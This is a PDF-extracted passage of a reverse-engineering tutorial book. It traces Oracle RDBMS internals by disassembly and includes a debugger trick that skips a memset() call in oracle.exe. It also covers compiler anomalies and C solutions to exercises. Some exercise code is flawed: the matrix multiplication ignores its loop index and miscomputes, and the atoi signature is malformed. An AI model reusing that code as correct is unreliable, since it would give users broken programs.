Other Memory Pools [Video] [ID /one.pnum/four.pnum/six.pnum/five.pnum/nine.pnum/nine.pnum./one.pnum] note:
There is a fixed table called X$KSMLRU that tracks allocations in the shared pool that cause
other objects in the shared pool to be aged out. This fixed table can be used to identify what is
causing the large allocation.
If many objects are being periodically flushed from the shared pool then this will cause re-
sponse time problems and will likely cause library cache latch contention problems when the ob-
jects are reloaded into the shared pool.
One unusual thing about the X$KSMLRU fixed table is that the contents of the fixed table are
erased whenever someone selects from the fixed table. This is done since the fixed table stores
only the largest allocations that have occurred. The values are reset a/f_ter being selected so that
subsequent large allocations can be noted even if they were not quite as large as others that oc-
curred previously. Because of this resetting, the output of selecting from this table should be care-
fully kept since it cannot be retrieved back a/f_ter the query is issued.
However, as it can be easily checked, this table’s contents is cleared each time table querying. Are we able to
find why? Let’s back to tables we already know: kqftab andkqftap which were generated with oracle tables/one.pnum/two.pnum
help, containing all information about X$-tables, now we can see here, the ksmlrs() function is called to prepare
this table’s elements:
Listing /seven.pnum./one.pnum/zero.pnum: Result of oracle tables
kqftab_element.name: [X$KSMLRU] ?: [ksmlr] 0x4 0x64 0x11 0xc 0xffffc0bb 0x5
kqftap_param.name=[ADDR] ?: 0x917 0x0 0x0 0x0 0x4 0x0 0x0
kqftap_param.name=[INDX] ?: 0xb02 0x0 0x0 0x0 0x4 0x0 0x0
kqftap_param.name=[INST_ID] ?: 0xb02 0x0 0x0 0x0 0x4 0x0 0x0
kqftap_param.name=[KSMLRIDX] ?: 0xb02 0x0 0x0 0x0 0x4 0x0 0x0
kqftap_param.name=[KSMLRDUR] ?: 0xb02 0x0 0x0 0x0 0x4 0x4 0x0
kqftap_param.name=[KSMLRSHRPOOL] ?: 0xb02 0x0 0x0 0x0 0x4 0x8 0x0
/one.pnum/two.pnumhttp://yurichev.com/oracle_tables.html
/two.pnum/four.pnum/three.pnum
kqftap_param.name=[KSMLRCOM] ?: 0x501 0x0 0x0 0x0 0x14 0xc 0x0
kqftap_param.name=[KSMLRSIZ] ?: 0x2 0x0 0x0 0x0 0x4 0x20 0x0
kqftap_param.name=[KSMLRNUM] ?: 0x2 0x0 0x0 0x0 0x4 0x24 0x0
kqftap_param.name=[KSMLRHON] ?: 0x501 0x0 0x0 0x0 0x20 0x28 0x0
kqftap_param.name=[KSMLROHV] ?: 0xb02 0x0 0x0 0x0 0x4 0x48 0x0
kqftap_param.name=[KSMLRSES] ?: 0x17 0x0 0x0 0x0 0x4 0x4c 0x0
kqftap_param.name=[KSMLRADU] ?: 0x2 0x0 0x0 0x0 0x4 0x50 0x0
kqftap_param.name=[KSMLRNID] ?: 0x2 0x0 0x0 0x0 0x4 0x54 0x0
kqftap_param.name=[KSMLRNSD] ?: 0x2 0x0 0x0 0x0 0x4 0x58 0x0
kqftap_param.name=[KSMLRNCD] ?: 0x2 0x0 0x0 0x0 0x4 0x5c 0x0
kqftap_param.name=[KSMLRNED] ?: 0x2 0x0 0x0 0x0 0x4 0x60 0x0
kqftap_element.fn1=ksmlrs
kqftap_element.fn2=NULL
Indeed, with the tracer /five.pnum./zero.pnum./one.pnum help it’s easy to see that this function is called each time we query the X$KSMLRU
table.
Here we see a references to ksmsplu_sp() andksmsplu_jp() functions, each of them call ksmsplu() finally.
At the end of ksmsplu() function we see a call to memset() :
Listing /seven.pnum./one.pnum/one.pnum: ksm.o
...
.text:00434C50 loc_434C50: ; DATA XREF: .rdata:off_5E50EA8
.text:00434C50 mov edx, [ebp-4]
.text:00434C53 mov [eax], esi
.text:00434C55 mov esi, [edi]
.text:00434C57 mov [eax+4], esi
.text:00434C5A mov [edi], eax
.text:00434C5C add edx, 1
.text:00434C5F mov [ebp-4], edx
.text:00434C62 jnz loc_434B7D
.text:00434C68 mov ecx, [ebp+14h]
.text:00434C6B mov ebx, [ebp-10h]
.text:00434C6E mov esi, [ebp-0Ch]
.text:00434C71 mov edi, [ebp-8]
.text:00434C74 lea eax, [ecx+8Ch]
.text:00434C7A push 370h ; Size
.text:00434C7F push 0 ; Val
.text:00434C81 push eax ; Dst
.text:00434C82 call __intel_fast_memset
.text:00434C87 add esp, 0Ch
.text:00434C8A mov esp, ebp
.text:00434C8C pop ebp
.text:00434C8D retn
.text:00434C8D _ksmsplu endp
Constructions like memset (block, 0, size) are o/f_ten used just to zero memory block. What if we would
take a risk, block memset() call and see what will happen?
Let’s run tracer /five.pnum./zero.pnum./one.pnum with the following options: set breakpoint at 0x434C7A (the point where memset() argu-
ments are to be passed), thus, that tracer /five.pnum./zero.pnum./one.pnum set program counter EIPat this place to the place where passed to
memset() arguments are to be cleared (at 0x434C8A ) It can be said, we just simulate an unconditional jump from
the address 0x434C7A to0x434C8A .
tracer -a:oracle.exe bpx=oracle.exe!0x00434C7A,set(eip,0x00434C8A)
(Important: all these addresses are valid only for win/three.pnum/two.pnum-version of Oracle RDBMS /one.pnum/one.pnum./two.pnum)
Indeed, now we can query X$KSMLRU table as many times as we want and it’s not cleared anymore!
Don’t trythisathome ("MythBusters") Don’t try this on your production servers.
It’s probably not a very useful or desired system behaviour, but as an experiment of locating piece of code we
need, that’s perfectly suit our needs!
/two.pnum/four.pnum/four.pnum
/seven.pnum./three.pnum./three.pnum V$TIMER table in Oracle RDBMS
V$TIMER is another fixed view , reflecting some o/f_ten changed value:
V$TIMER displays the elapsed time in hundredths of a second. Time is measured since the
beginning of the epoch, which is operating system specific, and wraps around to /zero.pnum again whenever
the value overflows four bytes (roughly /four.pnum/nine.pnum/seven.pnum days).
(From Oracle RDBMS documentation/one.pnum/three.pnum)
It’s interesting that periods are different for Oracle for win/three.pnum/two.pnum and for Linux. Will we able to find a function
generating this value?
As we can see, this information is finally taken from X$KSUTM table.
SQL> select * from V$FIXED_VIEW_DEFINITION where view_name=’V$TIMER’;
VIEW_NAME
------------------------------
VIEW_DEFINITION
--------------------------------------------------------------------------------
V$TIMER
select HSECS from GV$TIMER where inst_id = USERENV(’Instance’)
SQL> select * from V$FIXED_VIEW_DEFINITION where view_name=’GV$TIMER’;
VIEW_NAME
------------------------------
VIEW_DEFINITION
--------------------------------------------------------------------------------
GV$TIMER
select inst_id,ksutmtim from x$ksutm
Now we stuck in problem, there are no references to value generating function(s) in the tables kqftab /kqftap :
Listing /seven.pnum./one.pnum/two.pnum: Result of oracle tables
kqftab_element.name: [X$KSUTM] ?: [ksutm] 0x1 0x4 0x4 0x0 0xffffc09b 0x3
kqftap_param.name=[ADDR] ?: 0x10917 0x0 0x0 0x0 0x4 0x0 0x0
kqftap_param.name=[INDX] ?: 0x20b02 0x0 0x0 0x0 0x4 0x0 0x0
kqftap_param.name=[INST_ID] ?: 0xb02 0x0 0x0 0x0 0x4 0x0 0x0
kqftap_param.name=[KSUTMTIM] ?: 0x1302 0x0 0x0 0x0 0x4 0x0 0x1e
kqftap_element.fn1=NULL
kqftap_element.fn2=NULL
Let’s try to find a string KSUTMTIM , and we find it in this function:
kqfd_DRN_ksutm_c proc near ; DATA XREF: .rodata:0805B4E8
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push offset ksugtm
push offset _2__STRING_1263_0 ; "KSUTMTIM"
push [ebp+arg_8]
push [ebp+arg_0]
/one.pnum/three.pnumhttp://docs.oracle.com/cd/B28359_01/server.111/b28320/dynviews_3104.htm
/two.pnum/four.pnum/five.pnum
call kqfd_cfui_drain
add esp, 14h
mov esp, ebp
pop ebp
retn
kqfd_DRN_ksutm_c endp
The function kqfd_DRN_ksutm_c() is mentioned in kqfd_tab_registry_0 table:
dd offset _2__STRING_62_0 ; "X$KSUTM"
dd offset kqfd_OPN_ksutm_c
dd offset kqfd_tabl_fetch
dd 0
dd 0
dd offset kqfd_DRN_ksutm_c
There are also some function ksugtm() referenced here. Let’s see what’s in it (Linux x/eight.pnum/six.pnum):
Listing /seven.pnum./one.pnum/three.pnum: ksu.o
ksugtm proc near
var_1C = byte ptr -1Ch
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
call slgcs
pop ecx
mov edx, [ebp+arg_4]
mov [edx], eax
mov eax, 4
mov esp, ebp
pop ebp
retn
ksugtm endp
Almost the same code in win/three.pnum/two.pnum-version.
Is this the function we are looking for? Let’s see:
tracer -a:oracle.exe bpf=oracle.exe!_ksugtm,args:2,dump_args:0x4
Let’s try again:
SQL> select * from V$TIMER;
HSECS
----------
27294929
SQL> select * from V$TIMER;
HSECS
----------
27295006
SQL> select * from V$TIMER;
HSECS
----------
27295167
Output of tracer /five.pnum./zero.pnum./one.pnum:
/two.pnum/four.pnum/six.pnum
TID=2428|(0) oracle.exe!_ksugtm (0x0, 0xd76c5f0) (called from oracle.exe!__VInfreq__qerfxFetch+0xfad (0
x56bb6d5))
Argument 2/2
0D76C5F0: 38 C9 "8. "
TID=2428|(0) oracle.exe!_ksugtm () -> 0x4 (0x4)
Argument 2/2 difference
00000000: D1 7C A0 01 ".|.. "
TID=2428|(0) oracle.exe!_ksugtm (0x0, 0xd76c5f0) (called from oracle.exe!__VInfreq__qerfxFetch+0xfad (0
x56bb6d5))
Argument 2/2
0D76C5F0: 38 C9 "8. "
TID=2428|(0) oracle.exe!_ksugtm () -> 0x4 (0x4)
Argument 2/2 difference
00000000: 1E 7D A0 01 ".}.. "
TID=2428|(0) oracle.exe!_ksugtm (0x0, 0xd76c5f0) (called from oracle.exe!__VInfreq__qerfxFetch+0xfad (0
x56bb6d5))
Argument 2/2
0D76C5F0: 38 C9 "8. "
TID=2428|(0) oracle.exe!_ksugtm () -> 0x4 (0x4)
Argument 2/2 difference
00000000: BF 7D A0 01 ".}.. "
Indeed — the value is the same we see in SQL *Plus and it’s returning via second argument.
Let’s see what is in slgcs() (Linux x/eight.pnum/six.pnum):
slgcs proc near
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov [ebp+var_4], ebx
mov eax, [ebp+arg_0]
call $+5
pop ebx
nop ; PIC mode
mov ebx, offset _GLOBAL_OFFSET_TABLE_
mov dword ptr [eax], 0
call sltrgatime64 ; PIC mode
push 0
push 0Ah
push edx
push eax
call __udivdi3 ; PIC mode
mov ebx, [ebp+var_4]
add esp, 10h
mov esp, ebp
pop ebp
retn
slgcs endp
(it’s just a call to sltrgatime64() and division of its result by /one.pnum/zero.pnum /one.pnum./one.pnum/two.pnum)
And win/three.pnum/two.pnum-version:
_slgcs proc near ; CODE XREF: _dbgefgHtElResetCount+15
; _dbgerRunActions+1528
db 66h
nop
push ebp
mov ebp, esp
mov eax, [ebp+8]
mov dword ptr [eax], 0
call ds:__imp__GetTickCount@0 ; GetTickCount()
mov edx, eax
/two.pnum/four.pnum/seven.pnum
mov eax, 0CCCCCCCDh
mul edx
shr edx, 3
mov eax, edx
mov esp, ebp
pop ebp
retn
_slgcs endp
It’s just result of GetTickCount()/one.pnum/four.pnumdivided by /one.pnum/zero.pnum /one.pnum./one.pnum/two.pnum.
Voilà! That’s why win/three.pnum/two.pnum-version and Linux x/eight.pnum/six.pnum version show different results, just because they are generated
by different operation system functions.
Drain apparently mean connecting specific table column to specific function.
I added the table kqfd_tab_registry_0 to oracle tables/one.pnum/five.pnum, now we can see, how table column’s variables are
connected to specific functions:
[X$KSUTM] [kqfd_OPN_ksutm_c] [kqfd_tabl_fetch] [NULL] [NULL] [kqfd_DRN_ksutm_c]
[X$KSUSGIF] [kqfd_OPN_ksusg_c] [kqfd_tabl_fetch] [NULL] [NULL] [kqfd_DRN_ksusg_c]
OPN, apparently, open , and DRN, apparently, meaning drain .
/one.pnum/four.pnumhttp://msdn.microsoft.com/en-us/library/windows/desktop/ms724408(v=vs.85).aspx
/one.pnum/five.pnumhttp://yurichev.com/oracle_tables.html
/two.pnum/four.pnum/eight.pnum
Chapter /eight.pnum
Other things
/eight.pnum./one.pnum Compiler’s anomalies
Intel C++ /one.pnum/zero.pnum./one.pnum, which was used for Oracle RDBMS /one.pnum/one.pnum./two.pnum Linux/eight.pnum/six.pnum compilation, may emit two JZin row, and there are
no references to the second JZ. SecondJZis thus senseless.
Listing /eight.pnum./one.pnum: kdli.o from libserver/one.pnum/one.pnum.a
.text:08114CF1 loc_8114CF1: ; CODE XREF: __PGOSF539_kdlimemSer
+89A
.text:08114CF1 ; __PGOSF539_kdlimemSer+3994
.text:08114CF1 8B 45 08 mov eax, [ebp+arg_0]
.text:08114CF4 0F B6 50 14 movzx edx, byte ptr [eax+14h]
.text:08114CF8 F6 C2 01 test dl, 1
.text:08114CFB 0F 85 17 08 00 00 jnz loc_8115518
.text:08114D01 85 C9 test ecx, ecx
.text:08114D03 0F 84 8A 00 00 00 jz loc_8114D93
.text:08114D09 0F 84 09 08 00 00 jz loc_8115518
.text:08114D0F 8B 53 08 mov edx, [ebx+8]
.text:08114D12 89 55 FC mov [ebp+var_4], edx
.text:08114D15 31 C0 xor eax, eax
.text:08114D17 89 45 F4 mov [ebp+var_C], eax
.text:08114D1A 50 push eax
.text:08114D1B 52 push edx
.text:08114D1C E8 03 54 00 00 call len2nbytes
.text:08114D21 83 C4 08 add esp, 8
Listing /eight.pnum./two.pnum: from the same code
.text:0811A2A5 loc_811A2A5: ; CODE XREF: kdliSerLengths+11C
.text:0811A2A5 ; kdliSerLengths+1C1
.text:0811A2A5 8B 7D 08 mov edi, [ebp+arg_0]
.text:0811A2A8 8B 7F 10 mov edi, [edi+10h]
.text:0811A2AB 0F B6 57 14 movzx edx, byte ptr [edi+14h]
.text:0811A2AF F6 C2 01 test dl, 1
.text:0811A2B2 75 3E jnz short loc_811A2F2
.text:0811A2B4 83 E0 01 and eax, 1
.text:0811A2B7 74 1F jz short loc_811A2D8
.text:0811A2B9 74 37 jz short loc_811A2F2
.text:0811A2BB 6A 00 push 0
.text:0811A2BD FF 71 08 push dword ptr [ecx+8]
.text:0811A2C0 E8 5F FE FF FF call len2nbytes
It’s probably code generator bug wasn’t found by tests, because, resulting code is working correctly anyway.
Another compiler anomaly I described here /one.pnum./one.pnum/five.pnum./two.pnum.
I’m showing such cases here, so to understand that such compilers errors are possible and sometimes one
should not to rack one’s brain and think why compiler generated such strange code.
/two.pnum/four.pnum/nine.pnum
Chapter /nine.pnum
Tasks solutions
/nine.pnum./one.pnum Easy level
/nine.pnum./one.pnum./one.pnum Task /one.pnum./one.pnum
Solution: toupper() .
C source code:
char toupper ( char c )
{
if( c >= ’a’ && c <= ’z’ ) {
c = c - ’a’ + ’A’;
}
return( c );
}
/nine.pnum./one.pnum./two.pnum Task /one.pnum./two.pnum
Solution: atoi()
C source code:
#include <stdio.h>
#include <string.h>
#include <ctype.h>
int atoi ( const *p ) /* convert ASCII string to integer */
{
int i;
char s;
while( isspace ( *p ) )
++p;
s = *p;
if( s == ’+’ || s == ’-’ )
++p;
i = 0;
while( isdigit(*p) ) {
i = i * 10 + *p - ’0’;
++p;
}
if( s == ’-’ )
i = - i;
return( i );
}
/nine.pnum./one.pnum./three.pnum Task /one.pnum./three.pnum
Solution: srand() /rand() .
/two.pnum/five.pnum/zero.pnum
C source code:
static unsigned int v;
void srand (unsigned int s)
{
v = s;
}
int rand ()
{
return( ((v = v * 214013L
+ 2531011L) >> 16) & 0x7fff );
}
/nine.pnum./one.pnum./four.pnum Task /one.pnum./four.pnum
Solution: strstr() .
C source code:
char * strstr (
const char * str1,
const char * str2
)
{
char *cp = (char *) str1;
char *s1, *s2;
if ( !*str2 )
return((char *)str1);
while (*cp)
{
s1 = cp;
s2 = (char *) str2;
while ( *s1 && *s2 && !(*s1-*s2) )
s1++, s2++;
if (!*s2)
return(cp);
cp++;
}
return(NULL);
}
/nine.pnum./one.pnum./five.pnum Task /one.pnum./five.pnum
Hint #/one.pnum: Keep in mind that __v — global variable.
Hint #/two.pnum: That function is called in startup code, before main() execution.
Solution: early Pentium CPU FDIV bug checking/one.pnum.
C source code:
unsigned _v; // _v
enum e {
PROB_P5_DIV = 0x0001
};
/one.pnumhttp://en.wikipedia.org/wiki/Pentium_FDIV_bug
/two.pnum/five.pnum/one.pnum
void f( void ) // __verify_pentium_fdiv_bug
{
/*
Verify we have got the Pentium FDIV problem.
The volatiles are to scare the optimizer away.
*/
volatile double v1 = 4195835;
volatile double v2 = 3145727;
if( (v1 - (v1/v2)*v2) > 1.0e-8 ) {
_v |= PROB_P5_DIV;
}
}
/nine.pnum./one.pnum./six.pnum Task /one.pnum./six.pnum
Hint: it might be helpful to google a constant used here.
Solution: TEA encryption algorithm/two.pnum.
C source code (taken from http://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm ):
void f (unsigned int* v, unsigned int* k) {
unsigned int v0=v[0], v1=v[1], sum=0, i; /* set up */
unsigned int delta=0x9e3779b9; /* a key schedule constant */
unsigned int k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
for (i=0; i < 32; i++) { /* basic cycle start */
sum += delta;
v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
} /* end cycle */
v[0]=v0; v[1]=v1;
}
/nine.pnum./one.pnum./seven.pnum Task /one.pnum./seven.pnum
Hint: the table contain pre-calculated values. It’s possible to implement the function without it, but it will work
slower, though.
Solution: this function reverse all bits in input /three.pnum/two.pnum-bit integer. It’s lib/bitrev.c from Linux kernel.
C source code:
const unsigned char byte_rev_table[256] = {
0x00, 0x80, 0x40, 0xc0, 0x20, 0xa0, 0x60, 0xe0,
0x10, 0x90, 0x50, 0xd0, 0x30, 0xb0, 0x70, 0xf0,
0x08, 0x88, 0x48, 0xc8, 0x28, 0xa8, 0x68, 0xe8,
0x18, 0x98, 0x58, 0xd8, 0x38, 0xb8, 0x78, 0xf8,
0x04, 0x84, 0x44, 0xc4, 0x24, 0xa4, 0x64, 0xe4,
0x14, 0x94, 0x54, 0xd4, 0x34, 0xb4, 0x74, 0xf4,
0x0c, 0x8c, 0x4c, 0xcc, 0x2c, 0xac, 0x6c, 0xec,
0x1c, 0x9c, 0x5c, 0xdc, 0x3c, 0xbc, 0x7c, 0xfc,
0x02, 0x82, 0x42, 0xc2, 0x22, 0xa2, 0x62, 0xe2,
0x12, 0x92, 0x52, 0xd2, 0x32, 0xb2, 0x72, 0xf2,
0x0a, 0x8a, 0x4a, 0xca, 0x2a, 0xaa, 0x6a, 0xea,
0x1a, 0x9a, 0x5a, 0xda, 0x3a, 0xba, 0x7a, 0xfa,
0x06, 0x86, 0x46, 0xc6, 0x26, 0xa6, 0x66, 0xe6,
0x16, 0x96, 0x56, 0xd6, 0x36, 0xb6, 0x76, 0xf6,
0x0e, 0x8e, 0x4e, 0xce, 0x2e, 0xae, 0x6e, 0xee,
0x1e, 0x9e, 0x5e, 0xde, 0x3e, 0xbe, 0x7e, 0xfe,
0x01, 0x81, 0x41, 0xc1, 0x21, 0xa1, 0x61, 0xe1,
0x11, 0x91, 0x51, 0xd1, 0x31, 0xb1, 0x71, 0xf1,
0x09, 0x89, 0x49, 0xc9, 0x29, 0xa9, 0x69, 0xe9,
0x19, 0x99, 0x59, 0xd9, 0x39, 0xb9, 0x79, 0xf9,
/two.pnumTiny Encryption Algorithm
/two.pnum/five.pnum/two.pnum
0x05, 0x85, 0x45, 0xc5, 0x25, 0xa5, 0x65, 0xe5,
0x15, 0x95, 0x55, 0xd5, 0x35, 0xb5, 0x75, 0xf5,
0x0d, 0x8d, 0x4d, 0xcd, 0x2d, 0xad, 0x6d, 0xed,
0x1d, 0x9d, 0x5d, 0xdd, 0x3d, 0xbd, 0x7d, 0xfd,
0x03, 0x83, 0x43, 0xc3, 0x23, 0xa3, 0x63, 0xe3,
0x13, 0x93, 0x53, 0xd3, 0x33, 0xb3, 0x73, 0xf3,
0x0b, 0x8b, 0x4b, 0xcb, 0x2b, 0xab, 0x6b, 0xeb,
0x1b, 0x9b, 0x5b, 0xdb, 0x3b, 0xbb, 0x7b, 0xfb,
0x07, 0x87, 0x47, 0xc7, 0x27, 0xa7, 0x67, 0xe7,
0x17, 0x97, 0x57, 0xd7, 0x37, 0xb7, 0x77, 0xf7,
0x0f, 0x8f, 0x4f, 0xcf, 0x2f, 0xaf, 0x6f, 0xef,
0x1f, 0x9f, 0x5f, 0xdf, 0x3f, 0xbf, 0x7f, 0xff,
};
unsigned char bitrev8(unsigned char byte)
{
return byte_rev_table[byte];
}
unsigned short bitrev16(unsigned short x)
{
return (bitrev8(x & 0xff) << 8) | bitrev8(x >> 8);
}
/**
* bitrev32 - reverse the order of bits in a unsigned int value
* @x: value to be bit-reversed
*/
unsigned int bitrev32(unsigned int x)
{
return (bitrev16(x & 0xffff) << 16) | bitrev16(x >> 16);
}
/nine.pnum./one.pnum./eight.pnum Task /one.pnum./eight.pnum
Solution: two /one.pnum/zero.pnum/zero.pnum*/two.pnum/zero.pnum/zero.pnum matrices of double type addition.
C/C++ source code:
#define M 100
#define N 200
void s(double *a, double *b, double *c)
{
for(int i=0;i<N;i++)
for(int j=0;j<M;j++)
*(c+i*M+j)=*(a+i*M+j) + *(b+i*M+j);
};
/nine.pnum./one.pnum./nine.pnum Task /one.pnum./nine.pnum
Solution: two matrices (one is /one.pnum/zero.pnum/zero.pnum*/two.pnum/zero.pnum/zero.pnum, second is /one.pnum/zero.pnum/zero.pnum*/three.pnum/zero.pnum/zero.pnum) of double type multiplication, result: /one.pnum/zero.pnum/zero.pnum*/three.pnum/zero.pnum/zero.pnum matrix.
C/C++ source code:
#define M 100
#define N 200
#define P 300
void m(double *a, double *b, double *c)
{
for(int i=0;i<M;i++)
for(int j=0;j<P;j++)
{
/two.pnum/five.pnum/three.pnum
*(c+i*M+j)=0;
for (int k=0;k<N;k++) *(c+i*M+j)+=*(a+i*M+j) * *(b+i*M+j);
}
};
/nine.pnum./two.pnum Middle level
/nine.pnum./two.pnum./one.pnum Task /two.pnum./one.pnum
Hint #/one.pnum: The code has one characteristic thing, considering it, it may help narrowing search of right function among
glibc functions.
Solution: characteristic — is callback-function calling /one.pnum./one.pnum/nine.pnum, pointer to which is passed in /four.pnumth argument. It’s
quicksort() .
C source code:
/* Copyright (C) 1991,1992,1996,1997,1999,2004 Free Software Foundation, Inc.
This file is part of the GNU C Library.
Written by Douglas C. Schmidt (schmidt@ics.uci.edu).
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, write to the Free
Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
02111-1307 USA. */
/* If you consider tuning this algorithm, you should consult first:
Engineering a sort function; Jon Bentley and M. Douglas McIlroy;
Software - Practice and Experience; Vol. 23 (11), 1249-1265, 1993. */
#include <alloca.h>
#include <limits.h>
#include <stdlib.h>
#include <string.h>
typedef int (*__compar_d_fn_t) (__const void *, __const void *, void *);
/* Byte-wise swap two items of size SIZE. */
#define SWAP(a, b, size) \
do \
{ \
register size_t __size = (size); \
register char *__a = (a), *__b = (b); \
do \
{ \
char __tmp = *__a; \
*__a++ = *__b; \
*__b++ = __tmp; \
} while (--__size > 0); \
} while (0)
/* Discontinue quicksort algorithm when partition gets below this size.
This particular magic number was chosen to work best on a Sun 4/260. */
#define MAX_THRESH 4
/two.pnum/five.pnum/four.pnum
/* Stack node declarations used to store unfulfilled partition obligations. */
typedef struct
{
char *lo;
char *hi;
} stack_node;
/* The next 4 #defines implement a very fast in-line stack abstraction. */
/* The stack needs log (total_elements) entries (we could even subtract
log(MAX_THRESH)). Since total_elements has type size_t, we get as
upper bound for log (total_elements):
bits per byte (CHAR_BIT) * sizeof(size_t). */
#define STACK_SIZE (CHAR_BIT * sizeof(size_t))
#define PUSH(low, high) ((void) ((top->lo = (low)), (top->hi = (high)), ++top))
#define POP(low, high) ((void) (--top, (low = top->lo), (high = top->hi)))
#define STACK_NOT_EMPTY (stack < top)
/* Order size using quicksort. This implementation incorporates
four optimizations discussed in Sedgewick:
1. Non-recursive, using an explicit stack of pointer that store the
next array partition to sort. To save time, this maximum amount
of space required to store an array of SIZE_MAX is allocated on the
stack. Assuming a 32-bit (64 bit) integer for size_t, this needs
only 32 * sizeof(stack_node) == 256 bytes (for 64 bit: 1024 bytes).
Pretty cheap, actually.
2. Chose the pivot element using a median-of-three decision tree.
This reduces the probability of selecting a bad pivot value and
eliminates certain extraneous comparisons.
3. Only quicksorts TOTAL_ELEMS / MAX_THRESH partitions, leaving
insertion sort to order the MAX_THRESH items within each partition.
This is a big win, since insertion sort is faster for small, mostly
sorted array segments.
4. The larger of the two sub-partitions is always pushed onto the
stack first, with the algorithm then concentrating on the
smaller partition. This *guarantees* no more than log (total_elems)
stack size is needed (actually O(1) in this case)! */
void
_quicksort (void *const pbase, size_t total_elems, size_t size,
__compar_d_fn_t cmp, void *arg)
{
register char *base_ptr = (char *) pbase;
const size_t max_thresh = MAX_THRESH * size;
if (total_elems == 0)
/* Avoid lossage with unsigned arithmetic below. */
return;
if (total_elems > MAX_THRESH)
{
char *lo = base_ptr;
char *hi = &lo[size * (total_elems - 1)];
stack_node stack[STACK_SIZE];
stack_node *top = stack;
PUSH (NULL, NULL);
while (STACK_NOT_EMPTY)
{
char *left_ptr;
/two.pnum/five.pnum/five.pnum
char *right_ptr;
/* Select median value from among LO, MID, and HI. Rearrange
LO and HI so the three values are sorted. This lowers the
probability of picking a pathological pivot value and
skips a comparison for both the LEFT_PTR and RIGHT_PTR in
the while loops. */
char *mid = lo + size * ((hi - lo) / size >> 1);
if ((*cmp) ((void *) mid, (void *) lo, arg) < 0)
SWAP (mid, lo, size);
if ((*cmp) ((void *) hi, (void *) mid, arg) < 0)
SWAP (mid, hi, size);
else
goto jump_over;
if ((*cmp) ((void *) mid, (void *) lo, arg) < 0)
SWAP (mid, lo, size);
jump_over:;
left_ptr = lo + size;
right_ptr = hi - size;
/* Here’s the famous ‘‘collapse the walls’’ section of quicksort.
Gotta like those tight inner loops! They are the main reason
that this algorithm runs much faster than others. */
do
{
while ((*cmp) ((void *) left_ptr, (void *) mid, arg) < 0)
left_ptr += size;
while ((*cmp) ((void *) mid, (void *) right_ptr, arg) < 0)
right_ptr -= size;
if (left_ptr < right_ptr)
{
SWAP (left_ptr, right_ptr, size);
if (mid == left_ptr)
mid = right_ptr;
else if (mid == right_ptr)
mid = left_ptr;
left_ptr += size;
right_ptr -= size;
}
else if (left_ptr == right_ptr)
{
left_ptr += size;
right_ptr -= size;
break;
}
}
while (left_ptr <= right_ptr);
/* Set up pointers for next iteration. First determine whether
left and right partitions are below the threshold size. If so,
ignore one or both. Otherwise, push the larger partition’s
bounds on the stack and continue sorting the smaller one. */
if ((size_t) (right_ptr - lo) <= max_thresh)
{
if ((size_t) (hi - left_ptr) <= max_thresh)
/* Ignore both small partitions. */
POP (lo, hi);
else
/* Ignore small left partition. */
lo = left_ptr;
/two.pnum/five.pnum/six.pnum
}
else if ((size_t) (hi - left_ptr) <= max_thresh)
/* Ignore small right partition. */
hi = right_ptr;
else if ((right_ptr - lo) > (hi - left_ptr))
{
/* Push larger left partition indices. */
PUSH (lo, right_ptr);
lo = left_ptr;
}
else
{
/* Push larger right partition indices. */
PUSH (left_ptr, hi);
hi = right_ptr;
}
}
}
/* Once the BASE_PTR array is partially sorted by quicksort the rest
is completely sorted using insertion sort, since this is efficient
for partitions below MAX_THRESH size. BASE_PTR points to the beginning
of the array to sort, and END_PTR points at the very last element in
the array (*not* one beyond it!). */
#define min(x, y) ((x) < (y) ? (x) : (y))
{
char *const end_ptr = &base_ptr[size * (total_elems - 1)];
char *tmp_ptr = base_ptr;
char *thresh = min(end_ptr, base_ptr + max_thresh);
register char *run_ptr;
/* Find smallest element in first threshold and place it at the
array’s beginning. This is the smallest array element,
and the operation speeds up insertion sort’s inner loop. */
for (run_ptr = tmp_ptr + size; run_ptr <= thresh; run_ptr += size)
if ((*cmp) ((void *) run_ptr, (void *) tmp_ptr, arg) < 0)
tmp_ptr = run_ptr;
if (tmp_ptr != base_ptr)
SWAP (tmp_ptr, base_ptr, size);
/* Insertion sort, running from left-hand-side up to right-hand-side. */
run_ptr = base_ptr + size;
while ((run_ptr += size) <= end_ptr)
{
tmp_ptr = run_ptr - size;
while ((*cmp) ((void *) run_ptr, (void *) tmp_ptr, arg) < 0)
tmp_ptr -= size;
tmp_ptr += size;
if (tmp_ptr != run_ptr)
{
char *trav;
trav = run_ptr + size;
while (--trav >= run_ptr)
{
char c = *trav;
char *hi, *lo;
for (hi = lo = trav; (lo -= size) >= tmp_ptr; hi = lo)
*hi = *lo;
/two.pnum/five.pnum/seven.pnum
*hi = c;
}
}
}
}
}
/two.pnum/five.pnum/eight.pnum
A/f_terword
/nine.pnum./three.pnum Donate
This book is free, available freely and available in source code form/three.pnum(LaTeX), and it will be so forever.
If you want to support my work, so that I could continue to add things to it regularly, you may consider dona-
tion.
You may donate by sending small (or not small) donation to bitcoin/four.pnum
1HRGTRdFNH1cE81zxWQg6jTtkLzAiGU9Lp
Figure /nine.pnum./one.pnum: bitcoin address
Other ways to donate are available on the page: http://yurichev.com/donate.html
Major benefactors will be mentioned right here.
/nine.pnum./four.pnum Questions?
Do not hesitate to mail any questions to the author: <dennis@yurichev.com>
Please, also do not hesitate to send me any corrections (including grammar ones (you see how horrible my
English is?)), etc.
/three.pnumhttps://github.com/dennis714/RE-for-beginners
/four.pnumhttp://en.wikipedia.org/wiki/Bitcoin
